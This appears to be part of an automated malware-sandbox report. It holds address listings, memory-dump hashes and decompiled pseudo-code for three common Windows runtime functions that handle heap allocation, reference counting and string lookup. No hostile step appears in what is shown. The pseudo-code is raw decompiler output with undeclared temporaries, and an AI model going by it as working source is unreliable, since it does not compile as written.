                                                      0x0499b9c6
                                                      0x0499b9cd
                                                      0x0499b9d1
                                                      0x0499bad4
                                                      0x0499bad8
                                                      0x0499bada
                                                      0x0499badc
                                                      0x0499badc
                                                      0x0499badf
                                                      0x0499bae0
                                                      0x0499bae2
                                                      0x0499bae4
                                                      0x0499baec
                                                      0x0499baee
                                                      0x0499baf0
                                                      0x0499baf0
                                                      0x0499baec
                                                      0x0499bafb
                                                      0x0499bafc
                                                      0x0499bafe
                                                      0x0499bb01
                                                      0x0499bb01
                                                      0x00000000
                                                      0x0499bb06
                                                      0x0499b9d7
                                                      0x0499b9db
                                                      0x0499b9db
                                                      0x0499b9de
                                                      0x0499b9de
                                                      0x0499b9e4
                                                      0x0499b9e7
                                                      0x0499b9ea
                                                      0x0499b9ec
                                                      0x0499b9ef
                                                      0x0499b9f3
                                                      0x0499ba1b
                                                      0x0499ba1b
                                                      0x0499ba23
                                                      0x0499ba24
                                                      0x0499ba27
                                                      0x0499ba2a
                                                      0x0499ba2b
                                                      0x0499ba2e
                                                      0x0499ba30
                                                      0x0499ba37
                                                      0x0499ba3f
                                                      0x0499ba9c
                                                      0x0499baa2
                                                      0x0499bb13
                                                      0x0499bb15
                                                      0x0499baae
                                                      0x0499baae
                                                      0x0499bab3
                                                      0x0499bab5
                                                      0x0499baba
                                                      0x0499bac8
                                                      0x0499bac8
                                                      0x0499baba
                                                      0x0499bacd
                                                      0x0499bacf
                                                      0x00000000
                                                      0x0499bacf
                                                      0x0499bb1a
                                                      0x00000000
                                                      0x0499bb1c
                                                      0x0499baa7
                                                      0x0499bb11
                                                      0x00000000
                                                      0x0499bb11
                                                      0x0499baa9
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0499ba41
                                                      0x0499ba41
                                                      0x0499ba41
                                                      0x0499ba58
                                                      0x0499ba5d
                                                      0x0499ba62
                                                      0x00000000
                                                      0x00000000
                                                      0x0499ba64
                                                      0x0499ba67
                                                      0x0499ba68
                                                      0x0499ba69
                                                      0x0499ba6c
                                                      0x0499ba6f
                                                      0x0499ba71
                                                      0x0499ba78
                                                      0x0499ba80
                                                      0x00000000
                                                      0x00000000
                                                      0x0499ba90
                                                      0x0499ba90
                                                      0x0499ba97
                                                      0x00000000
                                                      0x0499ba97
                                                      0x0499b9f5
                                                      0x0499b9f7
                                                      0x0499b9f7
                                                      0x0499b9fa
                                                      0x0499ba03
                                                      0x0499ba07
                                                      0x0499ba0c
                                                      0x0499ba10
                                                      0x0499ba17
                                                      0x00000000
                                                      0x0499b9f7
                                                      0x0499b9a6
                                                      0x0499b9a8
                                                      0x0499b9af
                                                      0x0499b9b3
                                                      0x00000000
                                                      0x00000000
                                                      0x0499b9b9
                                                      0x00000000
                                                      0x0499b9b9
                                                      0x0499b94d
                                                      0x0499b98f
                                                      0x0499b995
                                                      0x0499b999
                                                      0x0499b960
                                                      0x0499b967
                                                      0x0499b968
                                                      0x0499b96a
                                                      0x00000000
                                                      0x0499b96a
                                                      0x0499b99b
                                                      0x0499b99e
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0499b99e
                                                      0x0499b951
                                                      0x0499b954
                                                      0x0499b95a
                                                      0x0499b95e
                                                      0x0499b972
                                                      0x0499b979
                                                      0x0499b97d
                                                      0x0499b97f
                                                      0x0499b980
                                                      0x0499b982
                                                      0x0499b984
                                                      0x00000000
                                                      0x0499b984
                                                      0x00000000
                                                      0x0499b926
                                                      0x00000000
                                                      0x0499b926

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5acf10a0acafcd7395e5c818f892afa90220fcc71d59a841ec81e1e1f40a98d5
                                                      • Instruction ID: 70dcbd77820663beb1cb4f63eda808071be424528cf56c6cf9104206dba138ec
                                                      • Opcode Fuzzy Hash: 5acf10a0acafcd7395e5c818f892afa90220fcc71d59a841ec81e1e1f40a98d5
                                                      • Instruction Fuzzy Hash: 8071DF32200701AFEB21CF29D845F66B7EAFB84728F144938E6558B6A1DB79FD40CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04986DC9, Relevance: .2, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 79%
                                                      			E04986DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L04924620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E04986B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E04927D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E04949AE0();
					_t87 = L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0498795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0498795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0498795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0498795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L04924620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E04986B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E04986B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E04986B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E04986B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E04927D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E04949AE0();
								L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L04922400( &_v36);
							if(_v24 >= 0) {
								_t87 = L04922400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L04922400( &_v52);
							}
							if(_v28 >= 0) {
								return L04922400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                      0x04986dd4
                                                      0x04986dde
                                                      0x04986de1
                                                      0x04986de3
                                                      0x04986de6
                                                      0x04986de9
                                                      0x04986dec
                                                      0x04986def
                                                      0x04986df2
                                                      0x04986df5
                                                      0x04986dfe
                                                      0x04986e04
                                                      0x04986e09
                                                      0x04986e0d
                                                      0x04986e18
                                                      0x04986e1b
                                                      0x04986e22
                                                      0x04986e2d
                                                      0x04986e30
                                                      0x04986e36
                                                      0x04986e42
                                                      0x04986e4d
                                                      0x04986e50
                                                      0x04986e55
                                                      0x04986e5c
                                                      0x04986e6e
                                                      0x04986e5e
                                                      0x04986e67
                                                      0x04986e67
                                                      0x04986e73
                                                      0x04986e74
                                                      0x04986e77
                                                      0x04986e7c
                                                      0x04986e7d
                                                      0x04986e8e
                                                      0x04986e93
                                                      0x04986e9c
                                                      0x04986ea8
                                                      0x04986eab
                                                      0x04986eac
                                                      0x04986eb3
                                                      0x04986ecd
                                                      0x04986edc
                                                      0x04986ee2
                                                      0x04986ee5
                                                      0x04986ef2
                                                      0x04986efb
                                                      0x04986f01
                                                      0x04986f06
                                                      0x04986f0b
                                                      0x04986f11
                                                      0x04986f1a
                                                      0x04986f22
                                                      0x04986f26
                                                      0x04986f26
                                                      0x04986f33
                                                      0x04986f41
                                                      0x04986f44
                                                      0x04986f47
                                                      0x04986f54
                                                      0x04986f65
                                                      0x04986f77
                                                      0x04986f7c
                                                      0x04986f82
                                                      0x04986f91
                                                      0x04986f99
                                                      0x04986fa3
                                                      0x04986fae
                                                      0x04986fae
                                                      0x04986fba
                                                      0x04986fbb
                                                      0x04986fbc
                                                      0x04986fc1
                                                      0x04986fc2
                                                      0x04986fd3
                                                      0x04986fd8
                                                      0x04986fd8
                                                      0x04986fdf
                                                      0x04986fe8
                                                      0x04986fee
                                                      0x04986fee
                                                      0x04986ff5
                                                      0x04986ffb
                                                      0x04986ffb
                                                      0x04987004
                                                      0x00000000
                                                      0x0498700a
                                                      0x04987004
                                                      0x04986eb3
                                                      0x04986e9c
                                                      0x04987015

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                      • Instruction ID: 71266858ec05c4602b5bbccb337bd18001522858565cf70b7920a5b2e85d4495
                                                      • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                      • Instruction Fuzzy Hash: AF715F71A00619AFDB10EFA9C944AAEBBB9FF88714F104479E505EB250DB34FE41CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049052A5, Relevance: .2, Instructions: 161COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 80%
                                                      			E049052A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0491EEF0(0x49f79a0);
					_t104 =  *0x49f8210; // 0xc61cc0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x28000000
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E0491EB70(_t93, 0x49f79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_t10 = _t104 + 4; // 0x0
							_push( *_t10);
							_t53 = E04949890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0491EEF0(0x49f79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0491EB70(0, 0x49f79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t11 = _t104 + 0xe; // 0xc61cd802
								_t13 = _t104 + 0xc; // 0xc61ccd
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0493F0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0491EEF0(0x49f79a0);
									__eflags =  *0x49f8210 - _t104; // 0xc61cc0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x49f8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t37 = _t104 + 0x10; // 0x2000c61c
											_t95 =  *((intOrPtr*)( *_t37));
											E04984888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
										}
										E0491EB70(_t95, 0x49f79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_t38 = _t104 + 4; // 0x0
											_push( *_t38);
											E049495D0();
											L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_t41 = _t104 + 4; // 0x0
											_push( *_t41);
											E049495D0();
											L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0491EB70(_t93, 0x49f79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t25 = _t104 + 4; // 0x0
										_push( *_t25);
										E049495D0();
										L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E049495D0();
										L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t15 = _t104 + 0x10; // 0x2000c61c
								_t93 =  &_v20;
								_t17 = _t104 + 0xe; // 0xc61cd802
								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0493F0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                      0x049052a5
                                                      0x049052ad
                                                      0x049052b0
                                                      0x049052b3
                                                      0x049052b7
                                                      0x049052ba
                                                      0x049052bf
                                                      0x049052c4
                                                      0x049052cc
                                                      0x00000000
                                                      0x00000000
                                                      0x049052ce
                                                      0x049052d1
                                                      0x049052d9
                                                      0x049052dd
                                                      0x049052e7
                                                      0x049052f7
                                                      0x049052f9
                                                      0x049052fd
                                                      0x04960dcf
                                                      0x04960dd5
                                                      0x04960dd6
                                                      0x04960dd7
                                                      0x04960dd8
                                                      0x04960dd9
                                                      0x04960dde
                                                      0x04960ddf
                                                      0x04960de0
                                                      0x04960de1
                                                      0x04960de2
                                                      0x04960de2
                                                      0x04960de5
                                                      0x04960dea
                                                      0x04960dec
                                                      0x04960f60
                                                      0x04960f64
                                                      0x04960f70
                                                      0x04960f76
                                                      0x04960f79
                                                      0x04960f79
                                                      0x00000000
                                                      0x04960f64
                                                      0x04960df2
                                                      0x04960df7
                                                      0x04960e04
                                                      0x04960e04
                                                      0x04960e0d
                                                      0x04960e0d
                                                      0x04960e10
                                                      0x04960e1a
                                                      0x04960e1c
                                                      0x04960e4c
                                                      0x04960e52
                                                      0x04960e61
                                                      0x04960e67
                                                      0x04960e6b
                                                      0x04960e70
                                                      0x04960e76
                                                      0x04960ed7
                                                      0x04960edc
                                                      0x04960ee0
                                                      0x04960ee6
                                                      0x04960eea
                                                      0x04960eed
                                                      0x04960ef0
                                                      0x04960ef3
                                                      0x04960ef6
                                                      0x04960ef9
                                                      0x04960efb
                                                      0x04960efe
                                                      0x04960f01
                                                      0x04960f01
                                                      0x04960f0b
                                                      0x04960f12
                                                      0x04960f16
                                                      0x04960f18
                                                      0x04960f18
                                                      0x04960f1b
                                                      0x04960f2c
                                                      0x04960f31
                                                      0x04960f31
                                                      0x04960f35
                                                      0x04960f39
                                                      0x04960f3a
                                                      0x04960f3c
                                                      0x04960f3c
                                                      0x04960f3f
                                                      0x04960f50
                                                      0x04960f55
                                                      0x04960f55
                                                      0x04960f59
                                                      0x049052eb
                                                      0x049052f1
                                                      0x049052f1
                                                      0x04960e7d
                                                      0x04960e84
                                                      0x04960e88
                                                      0x04960e8a
                                                      0x04960e8a
                                                      0x04960e8d
                                                      0x04960e9e
                                                      0x04960ea3
                                                      0x04960ea3
                                                      0x04960ea7
                                                      0x04960eaf
                                                      0x04960eb3
                                                      0x04960eb9
                                                      0x04960eb9
                                                      0x04960ebc
                                                      0x04960ecd
                                                      0x04960ecd
                                                      0x00000000
                                                      0x04960eb3
                                                      0x04960e1e
                                                      0x04960e21
                                                      0x04960e25
                                                      0x04960e2b
                                                      0x04960e2f
                                                      0x04960e30
                                                      0x04960e3a
                                                      0x04960e3f
                                                      0x04960e41
                                                      0x00000000
                                                      0x00000000
                                                      0x04960e47
                                                      0x00000000
                                                      0x04960e47
                                                      0x04960df9
                                                      0x04960dfe
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04960dfe
                                                      0x04905303
                                                      0x04905307
                                                      0x00000000
                                                      0x04905309
                                                      0x00000000
                                                      0x04905309
                                                      0x04905307
                                                      0x049052e9
                                                      0x049052e9
                                                      0x00000000
                                                      0x049052e9
                                                      0x0490530e
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 24e9ed2553b2b1466732c5d6be4cc6900c0af8474fc2d9bac2a098dc94bd9a6b
                                                      • Instruction ID: 7044ba23772f093319f3e54868796465d1019a39d6a73f504eea0ba43b9253b3
                                                      • Opcode Fuzzy Hash: 24e9ed2553b2b1466732c5d6be4cc6900c0af8474fc2d9bac2a098dc94bd9a6b
                                                      • Instruction Fuzzy Hash: 8851AD71245742AFE721DF68C944B17BBE8FF80724F14893AE49687690E770F844CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04932AE4, Relevance: .2, Instructions: 159COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04932AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x49f8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x49f8208; // 0x49f8207
				_t8 = _t57 + 0x49f8208; // 0x49f8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x49f8450; // 0xc6365a
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x49f821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x49f6d5c; // 0x7fae0654
							_t72 =  *0x49f6d5c; // 0x7fae0654
							_t75 =  *0x49f6d5c; // 0x7fae0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x49f6d5c; // 0x7fae0654
							_t84 =  *0x49f6d5c; // 0x7fae0654
							_t87 =  *0x49f6d5c; // 0x7fae0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0494F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                      0x04932ae4
                                                      0x04932aec
                                                      0x04932aef
                                                      0x04932af4
                                                      0x04932af7
                                                      0x04932afd
                                                      0x04932b92
                                                      0x04932b92
                                                      0x04932b97
                                                      0x04932b9c
                                                      0x04932b9c
                                                      0x04932b03
                                                      0x04932b06
                                                      0x04932b09
                                                      0x04932b09
                                                      0x04932b0f
                                                      0x04932b15
                                                      0x04932b15
                                                      0x04932b1b
                                                      0x04932b1e
                                                      0x04932b21
                                                      0x04932b26
                                                      0x04932b29
                                                      0x04932b81
                                                      0x04932b84
                                                      0x04932c0e
                                                      0x04932c15
                                                      0x04932c24
                                                      0x04932c24
                                                      0x04932b8a
                                                      0x04932b8a
                                                      0x04932b8a
                                                      0x04932b8a
                                                      0x04932b90
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04932b4a
                                                      0x04932b4a
                                                      0x04932b4d
                                                      0x04932b53
                                                      0x00000000
                                                      0x00000000
                                                      0x04932b55
                                                      0x04932b58
                                                      0x04932bb7
                                                      0x04975d1b
                                                      0x04975d37
                                                      0x04975d47
                                                      0x04975d53
                                                      0x04932bbd
                                                      0x04932bbd
                                                      0x04932bbd
                                                      0x04932bb7
                                                      0x04932b5d
                                                      0x04932c2f
                                                      0x04975d5b
                                                      0x04975d77
                                                      0x04975d87
                                                      0x04975d93
                                                      0x04932c35
                                                      0x04932c35
                                                      0x04932c35
                                                      0x04932c2f
                                                      0x04932b65
                                                      0x04932b9f
                                                      0x04932ba2
                                                      0x04932b67
                                                      0x04932b67
                                                      0x04932b69
                                                      0x04932b6b
                                                      0x04932b6e
                                                      0x04932bc9
                                                      0x04932bcc
                                                      0x04932bcf
                                                      0x04932bd4
                                                      0x04932bd6
                                                      0x04932bd6
                                                      0x04932bdb
                                                      0x04932c02
                                                      0x04932c05
                                                      0x04932c07
                                                      0x00000000
                                                      0x04932c07
                                                      0x04932be0
                                                      0x04932c00
                                                      0x04932c3f
                                                      0x04932c3f
                                                      0x00000000
                                                      0x04932c00
                                                      0x04932be5
                                                      0x04932be7
                                                      0x04932bec
                                                      0x04932bf4
                                                      0x04932bf6
                                                      0x00000000
                                                      0x04932bf6
                                                      0x04932b70
                                                      0x04932b76
                                                      0x04932b2b
                                                      0x04932b2b
                                                      0x04932b2d
                                                      0x04932b2f
                                                      0x04932b32
                                                      0x04932b35
                                                      0x04932b3a
                                                      0x00000000
                                                      0x04932b40
                                                      0x04932b43
                                                      0x04932b45
                                                      0x04932b47
                                                      0x04932b4a
                                                      0x04932b4d
                                                      0x04932b53
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04932b53
                                                      0x04932b78
                                                      0x04932b78
                                                      0x04932b7b
                                                      0x04932b7e
                                                      0x00000000
                                                      0x04932b7e
                                                      0x04932b76
                                                      0x04932ba5
                                                      0x04932ba5
                                                      0x04932ba8
                                                      0x04932bad
                                                      0x00000000
                                                      0x00000000
                                                      0x04932baf
                                                      0x04932baf
                                                      0x04932bc2
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9d6bae6a30bf994ddbfec5e0448b01652fab08cb9457ff9269e08fccfe41037d
                                                      • Instruction ID: bcc55d73cf8231462bbc5186dc13e0c948842703e3017dcc6f81d620c2bea73b
                                                      • Opcode Fuzzy Hash: 9d6bae6a30bf994ddbfec5e0448b01652fab08cb9457ff9269e08fccfe41037d
